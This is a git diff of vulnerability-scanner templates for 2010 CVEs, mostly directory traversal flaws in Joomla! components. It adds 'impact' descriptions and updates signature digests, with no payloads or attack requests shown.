a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 36ded21767..2f02fa0e59 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11760 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a460424f7d97033dcbe266eb3791229f7a28b8fc530061e37d85ab04597effb002200a8c83bccd2fed2c3c8bfe321e68864093f992bda6481aa461d52b0a581836f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206f23347fc78c49c9e4569468806b46c1f3a0a646c189a57c6e021e848668bc52022100d08e6c11bd627fc6eb6668dd39684ae70f76f50186063a230f92a15306a6dafe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index c1fcc917f2..811b4cafde 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11511 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100de73743eee8e218a64f00aee1fe51a44879f19bcc8b23166f946f07745624b6d02200c0609ad7c96266004a9dbd6ffe741bfeb5bfd2af21dc17c18c71b2b1deea71d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e30cde27274d020eca121c42cb054cc13396f5f6f7ec473d9e230814405ba65f02207f6f47e4db6c69be8b7442d0214777a30b8b37a8b5f04dd07b5e7e12bd3c3ee5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index bab015b3ea..5bbe680253 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/11814 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bd055bd6502d4b4a22b3f99f8b75ae7fd4d249a00d2d63062d041dd7dc23747d022100f3d3a5787ce5a40534d37ac4cde47925775cf0f453c8048bad186baee48a0e4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b0e6fbebe96039eec5eb535b07e2d769ebf29d714105a0e8516df81a99580eb02200d0bce9a850e85fdf23c0adde163f704107a4b53554740537a0b640c66956d6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 8f579c6260..d744e23582 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11757 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022028b9258dfa53cbf4a25f22b1a2d54ca076fd0af9d1b91249b029d848b42cbc7002202aba1a085f6eeb87eacccc07c59515c2e66ae771bd35fee5cedb8b8aa36620a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220596ef1369c12f8e3a916e8f9e33299432b1178e9ce95fde59ddc34f77142d2f7022100e9739fb2c8ce4e2826687b0ebd6931d92e35a1568effea53043306c97259db88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index 994ddce73e..07a22db236 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11978 @@ -37,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220346626db9d1e2e9dc2cb7b66f34fd4785e75af4d9d5f7c6643cb298e1be166ad022100a2d43a822439066dbbd49736f821a4ffa4128015862c28991a7e243f7d511cfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b57708e6b86599b708a873726d3263ce9e0d49d0e76391bb6e037a1e4937404e02205933cbacd47892558c18c7db7b4e88a0b4baec456d1c7c5491d0e2c9866f4c1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 12ad4332e0..4b9c11b144 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12065 @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e0a4475a7c35058ce79f49d108bb180242d90cc120c530dd911afd5c66f8a9dc022076d45a27b53fd0cafb5d7adac7596d2f6b6c776544037f7117ba2e8693824aec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e7b04454a6bb69f264e4dd4754eee56b3022c4c5ac84e46575de2bb39dcd4a51022100956719ea0bbde43fd2079b3d401d9f87038ff2daa9c9f264755da2c0fc2a9aae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 92be8dcec6..6fb0d4e198 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12058 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100db8f60e834d718a187a6affc3ddd8cb07625e1fb067e4d68b5a6f6bab98a0eb3022100b6da76ed5c5b35f5529aa45b95f8de9cc608a6c066dd69264579dc8b909dd0bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e1f4f0060c68c73b81b05fa0c036c433de7e7de661c13e245b6519b209dd0686022100f724f0853fa864ea201f7b3377b3a7ae4bafc82fb0db4544f09b7092d505e11c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 9cf836c028..360c5c2c26 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12070 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022048439f47a8b21a74b4b97fa613ad972080db3db4fe053230262199d82317045c022100eadd5c390ee4731465f6f514079896cd72f934fd9895315d895f65374aea4e72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204ea305e21cf6b002e44afd364c3d21030b96316a544c492604ec10f5ff96ecac022100cca452f129982dde163f273a63e54d06d5e6496eef9837cb8c2de19cbe2f74cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index b7bcb60de3..7ab4dfd294 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12066 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206a9af6404f873c9d3a57fe9df213511138f01fd29e3ea7105a802d41cf78924102205cb464a7bda81580894d76175190846c791dc1cd402a21817590737b159112e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064827a2b3a8d58ef4a2a3c46803548cec0052632c4c7f8d21f18118ebd14b3c6022058eb78319f044f69ba50ef4e0d899e39e70636966010a842185bd8f281387cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index cd667f1c0d..fb3b2be6e3 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12077 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f17626c6c2fb265ab27fa0646a728898f1b0c9f3fa847a9fb431a0e39fa82e8b022100f8103d182a1847d338a89d951149a9075835a9588ed011933dfed7688f480995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100867fd351a2a90244ed77e8046adc2180f92604b75e069d398751668b18310e9802202d41ba7430bbc6e96d855278855e1aefd1286ec09c836f3de9de918bde460e87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index 8e12721736..e298444bc2 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12082 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fd165e012bb572dc265b83b5ca8b9c947ddf01bea06fde0c71635d59e7c796e0022013898e8cab7e473e13999ca183c3d97e6bc26290443ddbae95c4946d4faf0ef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022069608b00d6cce302d41960d97e53dffd2328158a421962cdc5d326a3c65c13d60220253869fcf736190901161cb37df82fd67626fa6b943ac18ade19c1ade10bcba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 502fc07ce6..6b7a0166ed 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12086 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c6e61051c3e71766db8c93f1cba690d9e313100d617e7e936a55e737e9bfb3a802206edbc197346bf2a84a7297e202c7b67251c8f0546df7eb690cfaaa5d18b11595:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203ab74f27464637000a111771ceabe7ebf60c232bbce13a6e98a322da6de8bee8022004e7174b83c84a10ed6ef3361845038a32769c167a8c9af5e13cf68801097e59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 55697e9658..263ae97d41 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in weberpcustomer.php in the webERPcustomer (com_weberpcustomer) component 1.2.1 and 1.x before 1.06.02 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11999 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100935bdcc2bd3179773fce042c4a61ef810c9d2f814a47b93881e7c146477ff010022100a764011c1841a4d9b132ac59b8dfdb0592de77768416839b1f9c5f345112fb51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dc7c7d05af07a16c8189bdfeedfdefc06822cfb29f3b88ef920758007b104b2702200f9367dbbdc9cff4443413464334b1c74617dc88858f43e18aa91c25673c5203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 2965e9af5e..bc54569366 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + The vulnerability allows an attacker to include arbitrary local files, leading to remote code execution or sensitive information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/33797 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e147f2ff0fcbc48bff40b1ff5321883b2cc1adc91b31edfbb2600c5a8263862402201d97ad50b2b9fde2cff5a0c0239416196581f96dc8d5eff323bec0845867888b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008fe8611cd1efc4f804b1ee87a4214c6c9b21fc126850ea0f1f125c3338f0ed18022100b42e613cc4df538c18194ca7642095e0466c2d796db442442718dadcae08c21c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index c290568252..50c58cc2fc 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15453 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203bd1daa526a86b54b75dd6e090df43e78b56b22d1ddbff6a1ef56f04466f7e5b0220739e8df81fe0c2e77b397f7d2e0b4e334394ce071ea6a71f9168fea8414a941f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df0e15dc8ad751dfc509ae1b4143e07b3fb4ed6a605f8ade6971a5802196c61e022100e1d144cc199d7989faa57edff4c8b453911e79d83078f283231bc8863acab853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 71916abfbd..450a69d822 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12084 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cfca9f9c725e410d29e54e6b5d02eedb50e515395715de8019d2c3314e3cf3d302202df3ddf237a67c191f3bde94abc572e0a3ffe5dc0f56dbcf14e0921c3bc8d812:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220499958bd8b65329c91db733607eda67f42e998529c2f50d7bd31533e2f16099f0221009a946f09a949fae53df09425fbda4d4ed20e2bbe6efff9498d618febbfa13ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 600685cd42..caaaf7e905 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in LoginBox component. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008d048e5078f229b37cb81e90eaf130150a30ba619c876b18220cd4e112a07930022100c9c281d897386357f77dd4b97c302ab1490dc0a2c85ac217b57c888b3a82f978:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a72b93687ae905cb435bd660f819c05235fbbba93843921d66c92829f89326e5022100fa0275f518da4c827f358b9e50a65d64a79c88d9575fb5c2345c113944b2b673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index c347f154c8..9e17bd4159 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12102 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e7ffeef32693f6aaa1b9e73715026da5c9cc7ae3faeeba9b011d109229d4d711022043a4839f8f123a837925e5cbb0dbcd262d27ed75f3e07bd926872ccf644d6f44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5d1dc1258511f9a3bbcbb0f0046814c02884c77cd78b0aeb5347a539fd1704202210092074be1dceaa45c5bec4c8cdebe96901e5956aeff8bb2296f16b5e79131c0a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 72e511305c..89fc3bed5a 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks. remediation: | Apply the necessary patches or updates provided by Red Hat to fix the vulnerability. reference: @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cdc0f292decb28743adf2f23fffa226f0cfd208303a82282a13b1d34c1342f3e02204329a76e1cb2adadd04c7c271fc5fa03ea4030315e839638599a046a5ee65c9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eeb17d0a55fe9c292ed360d93e7dc16c7902595cadb704b45bded9319b572a7b022025cecd4333e92104c46103332061db86c2f1fb967473f61b7cd1f0f37afdc41d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index be154b3e06..a832f1351d 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! application. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12232 @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e85030cf632a155f98ccd3f5428e6c94f85503b2707ebe8c899f9efcb0af1ba1022100b682c31513f0e846c2ee8df5221596ebfe97005c4c2e2e939d6e2891ac80b27e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210096d617b9e4bee8999116e4486ab5679a0f8a0e2c3499f80dfbd7e82d29148637022052f87a0ce7cd16e33e9ff539425d1f7229f81901d825193e4586e89a021a2f87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 15c908a6ce..f9902c7043 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12146 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220509cc2f4146534580c7a7913594d4ef19b77fd1c74f0e0d29f242ebf6d537c08022100eb4cc1d1d8e3eac73b3a16e6bd7201945be29c95421c8d152f8af462e85066be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a230c9a42e5a5c8bb0d395087e0aca9cefd7285a167fa42c9a5a93b14c46d88022100e8550828a91b082e4c908b27285a1ef13d48a2f7580ec020f4ab09aecec205e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 9cf6cd730b..3dcaccf62e 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12166 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033273cdd3751604b219df79fef83b2a2db3cf41a006ebab132c3830ceca3d425022100e304d2b821ca739759d57be72ff0e9c59814d16e0666d337ac2fb4b458c175ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090ded558efdc68efdfc4f1021042fe040fd9623e489a797a51ae65dca54add4d022036194cfa1b5329324aac1be6674cbcd60f3f2f02ce8109881a3575f46e7f4929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 0d10ebec46..9bb821bd3a 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component Address Book or apply the necessary patches to fix the LFI vulnerability. reference: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210098fd435fd7ff07962ed5ecb7ad76b65b3dae0a06d576d7845b5495a5b706059e02205eb795796f5fe00743d1e3bc7f48d3c196e1590c792b75dcfdc1b7547e8b2d39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207abe352a0287053462859d617d5bd1fad54ddcac4ece82145ff93edb42ea650d0220645a86c6f1c30a29acafb429ee6448d393085220af5a5749ff0c71b29114a1d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index 72c2f14382..d62dd254c7 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12167 @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d7ecff15693dcc6ba114f6d0d873f07201f187f4caf25f0e5358e6c48f3a158d022056dbab57d855141513e2fd556ceb44f45df93528c1af8d2aacfa57015bd86945:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a968e604f3d5eb04a9d0d2b89e3a82a0abfaf1175bdac3d8cc895972c44b442b02201c5bbbefc7883b0bc96f5ffc6096d834707dcc79a31426f6d0a8f90c0c5394d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index ef7afa0bb4..e41af7fe09 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -5,6 +5,8 @@ info: 